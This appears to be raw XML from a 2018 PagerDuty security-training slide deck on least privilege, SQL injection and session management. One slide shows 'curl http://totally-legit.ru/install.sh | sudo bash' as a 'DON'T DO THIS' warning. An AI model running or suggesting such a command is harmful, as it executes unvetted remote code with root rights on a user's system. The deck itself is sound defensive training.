            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3724" y="-1625790"/>
            <a:ext cx="24391448" cy="17441713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2313"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2314"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315" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2316" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2317" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12745640" y="-17860"/>
            <a:ext cx="321470" cy="13789566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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1" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-927304" y="-38584"/>
            <a:ext cx="27762608" cy="13793168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2322"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232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324" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2325"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fast" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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9" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-3972048"/>
            <a:ext cx="24384001" cy="18288001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2330"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233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332" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2333"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fast" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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7" name="Additional Reading"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          Additional Reading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2338" name="https://www.owasp.org/index.php/Session_Management_Cheat_Sheet…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996553" y="4389304"/>
            <a:ext cx="22390894" cy="7469321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="617361" indent="-617361"/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Session_Management_Cheat_Sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="617361" indent="-617361"/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>http://www.browserauth.net/channel-bound-cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="617361" indent="-617361"/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://tools.ietf.org/html/draft-west-origin-cookies-01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="617361" indent="-617361"/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId6" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://tools.ietf.org/html/rfc5929</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2339" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="21"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2340"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341" name="PUBLIC"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PUBLIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2342" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2343" name="book (1).png" descr="book (1).png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="946811"/>
            <a:ext cx="3036094" cy="3036095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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7" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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348"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349" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2350" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2351" name="Permissions"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869950" y="4536281"/>
            <a:ext cx="22644099" cy="464343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gn="l">
              <a:defRPr sz="11200">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2352" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13160314" y="105631"/>
            <a:ext cx="9469700" cy="11015774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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56"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357"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358" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2359" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2360" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-44054" y="4955168"/>
            <a:ext cx="24472106" cy="3805664"/>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2361" name="curl http://totally-legit.ru/install.sh | sudo bash"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5531333" y="6392862"/>
            <a:ext cx="13321334"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>curl http://totally-legit.ru/install.sh | sudo bash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2362" name="DON’T DO THIS"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="358292"/>
            <a:ext cx="3717419" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>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DON’T DO THIS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2363" name="SHELL"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="52934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SHELL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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7" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-44054" y="4955168"/>
            <a:ext cx="24472106" cy="3805664"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2368"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36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370" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2371" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2372" name="sudo"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11398188" y="6392862"/>
            <a:ext cx="1587625"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>sudo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2373" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2897356" y="2414645"/>
            <a:ext cx="9592955" cy="9592954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2374" name="SHELL"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="52934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SHELL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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78" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="24384000" cy="13716000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2379" name="&quot;This is too much power for one person.&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="9300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>"This is too much power for one person."</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2380" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.png"/>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238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382" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2383"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med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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87"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388"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389" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2390" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2391" name="Revoke privileges you don’t need."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Revoke privileges you don’t need.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2392" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY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3" name="sql-injection-license-plate.jpg" descr="sql-injection-license-plate.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-347778" y="-28776"/>
            <a:ext cx="27679586" cy="15676824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="User input being executed in an SQL query at runtime."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1015016" y="5339953"/>
            <a:ext cx="22353968" cy="3036094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="698301">
              <a:defRPr sz="9520"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User input being executed in an SQL query at runtime.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="365"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366"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367" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="DEFINITION"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CA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DEFINITION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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6" name="Running reports on a DB? Use a read-only user.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844152" y="1163306"/>
            <a:ext cx="22390895" cy="8197454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Running reports on a DB?</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>Use a read-only user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deleting things from S3?</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>Use a role that can only touch the bucket you want.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2397"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398"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399" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
